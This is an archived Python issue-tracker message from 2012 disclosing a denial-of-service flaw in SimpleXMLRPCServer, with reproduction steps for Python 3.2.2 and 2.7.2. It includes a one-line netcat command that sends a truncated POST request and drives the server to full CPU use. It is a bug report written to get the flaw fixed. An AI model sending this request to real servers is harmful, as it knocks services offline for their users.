Message 153267 - Python tracker

➜

This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author	iankko
Recipients	iankko
Date	2012-02-13.13:45:32
SpamBayes Score	6.917839e-05
Marked as misclassified	No
Message-id	<1329140734.41.0.0376676358855.issue14001@psf.upfronthosting.co.za>
In-reply-to

Content
A denial of service flaw was found in the way Simple XML-RPC Server module of Python processed client connections, that were closed prior the complete request body has been received. A remote attacker could use this flaw to cause Python Simple XML-RPC based server process to consume excessive amount of CPU. Credit: Issue reported by Daniel Callaghan References: [1] https://bugzilla.redhat.com/show_bug.cgi?id=789790 Steps to reproduce: ------------------ A) for v3.2.2 version: 1) start server: cat s.py #!/usr/local/bin/python3 from xmlrpc.server import SimpleXMLRPCServer server = SimpleXMLRPCServer(('127.0.0.1', 12345)) server.serve_forever() 2) # top 3) issue request from client: echo -e 'POST /RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nlol bye' \| nc localhost 12345 Return to 'top' screen and see, how CPU consumption on particular host quickly moves to 100%. B) for v2.7.2 version: 1) start server: cat s.py #!/usr/bin/python from SimpleXMLRPCServer import SimpleXMLRPCServer server = SimpleXMLRPCServer(('127.0.0.1', 12345)) server.serve_forever() Steps 2) and 3) for v2.7.2 version are identical to those for v3.2.2 version.

A denial of service flaw was found in the way Simple XML-RPC Server module of Python processed client connections, that were closed prior the complete request body has been received. A remote attacker could use this flaw to cause Python Simple XML-RPC based server process to consume excessive amount of CPU.

Credit:
Issue reported by Daniel Callaghan

References:
[1] https://bugzilla.redhat.com/show_bug.cgi?id=789790

Steps to reproduce:
------------------
A) for v3.2.2 version:

1) start server:
cat s.py 
#!/usr/local/bin/python3

from xmlrpc.server import SimpleXMLRPCServer
server = SimpleXMLRPCServer(('127.0.0.1', 12345))
server.serve_forever()

2) # top

3) issue request from client:
echo -e 'POST /RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nlol bye' | nc localhost 12345

Return to 'top' screen and see, how CPU consumption on particular host quickly moves to 100%.

B) for v2.7.2 version:

1) start server:

cat s.py 
#!/usr/bin/python

from SimpleXMLRPCServer import SimpleXMLRPCServer

server = SimpleXMLRPCServer(('127.0.0.1', 12345))
server.serve_forever()

Steps 2) and 3) for v2.7.2 version are identical to
those for v3.2.2 version.

History
Date	User	Action	Args
2012-02-13 13:45:34	iankko	set	recipients: + iankko
2012-02-13 13:45:34	iankko	set	messageid: <1329140734.41.0.0376676358855.issue14001@psf.upfronthosting.co.za>
2012-02-13 13:45:33	iankko	link	issue14001 messages
2012-02-13 13:45:32	iankko	create